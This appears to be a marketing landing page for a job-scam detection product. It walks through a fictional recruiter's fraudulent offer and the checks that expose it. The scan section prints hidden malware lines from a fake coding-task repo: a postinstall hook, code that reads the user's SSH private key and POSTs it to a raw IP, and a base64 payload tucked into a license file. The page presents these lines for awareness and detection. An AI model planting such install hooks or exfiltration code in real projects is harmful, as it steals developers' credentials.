Live demo
A scam you'd never see coming

Your next job offer
might not be real.

Last year, job scams cost people $501 million — up 456% in four years. AI has erased the old warning signs: the typos, the broken grammar, the obvious branding slip-ups. The scam in your inbox looks perfect now.

Scroll down. Watch us catch one in real time.

Meet John Doe.
He just messaged you.

A senior recruiter at a real company, a remote role paying well above market, a message that reads warmly. The grammar is clean. The tone is friendly. Ten years ago, that was enough.

It isn't anymore.

Let's look closer.
scroll
LinkedIn · message2 min ago
Recruiter profile photo
John Doelinkedin.com/in/john-doe-8f2a1
Senior Technical Recruiter · Acme Corp
Hi! Your profile caught my attention — we're urgently hiring a Senior Frontend Engineer at Acme Corp. $240k base, equity, fully remote. Can we jump on Zoom today?

He looks normal.
The details don't.

Before you've finished reading the message, we've run fourteen checks on John. Six came back red.

Profile age
Only 34 days old
Connections
12 total · 0 mutual
Activity history
Never posted · never commented
Profile photo
AI-generated · 94% confidence
Message tone
Urgent · wants to go off-platform
Recommendations
None — on a senior role
Stage 1 risk0/ 100

Money talks.
Too-good money shouts.

We check every salary against real market data the moment it hits your inbox. John's offer is 33% above what this role actually pays. When it sounds too good to be true, it almost never is true.

Offered salary$0
market median · $180,000
+33% above market · elevated risk
Stage 2 risk42/ 100
Posting signals
Salary vs. market
+33% above typical
Apply URL
3-hop redirect to a look-alike
Careers page listing
Not on acmecorp.com
Role detail
No stack · no team · no manager
Apply button goes to
acmecorp-jobs.net/apply/fe-sr-2847
→ 3 redirects before it lands · not acmecorp.com

Two domains. One is pretending to be Acme.

The real Acme Corp is seven years old with 4,200 employees and working email authentication. John's version is a 47-day-old look-alike with none of it — and he's nowhere in the real company's directory.

Verifiedwhois
acmecorp.com
Domain age
2847 days
SPF
PASS
ScamAdviser
94/100
Recruiter's linkwhois
acmecorp-jobs.net
Domain age
47 days
SPF
FAIL
ScamAdviser
8/100
look-alike · not acme
John isn't listed as an Acme employee.
checked linkedin.com/company/acme-corp · 4,200 employees · 0 matches
Stage 3 risk54/ 100

The coding task
steals your SSH key.

Before you even open John's challenge, we read every line. It steals the key that unlocks your GitHub, your servers, your pipelines.

Microsoft and Mandiant have a name for this campaign: .

The repo · github.com/acme-hiring/frontend-coding-task
Stage 4 risk68/ 100
github.com/acme-hiring/frontend-coding-taskscanning…
package.json:14"postinstall": "node ./scripts/install.js",
install.js:4const key = fs.readFileSync(`${home}/.ssh/id_rsa`, 'utf8');
install.js:11fetch('http://185.220.101.34:8080/ex', { method: 'POST', body: key });
LICENSE.txt:48# aW1wb3J0IG9zO29zLnN5c3RlbSgiY3VybCBodHRwOi8vMTg1LjIyMC4xMDEuMzQi...

Real things
connect to real things.
John's story doesn't connect.

Every entity, every link, mapped in one picture. The cyan lines are what's real — a seven-year-old company with a verified domain. The magenta lines are where John's story falls apart.

  • What doesn't add up
  • Not an Acme employee
  • Fake look-alike domain
  • Domain mismatch
  • Repo built 34h ago
  • Sends data to Tor
Overall risk82/ 100
91/ 100

Confirmed pattern ·

John Doe doesn't work at Acme. His domain is fake. His “coding test” was built to steal the keys to your accounts. One DM, one posting, one repo — and $501M stolen from people just like you last year. You were about to be next.

What to do next
Do not run the repo. Block the recruiter. Report the profile to LinkedIn and alert the real Acme Corp.

The next one
won't catch you.

Get on the list. When Velanthar launches, we'll watch every recruiter DM, every job posting, every offer letter that crosses your inbox — and flag the scams before they waste a week of your life or empty your bank account.

Free while we're in beta. No spam. Unsubscribe any time.

Or reach us directly: hello@velanthar.com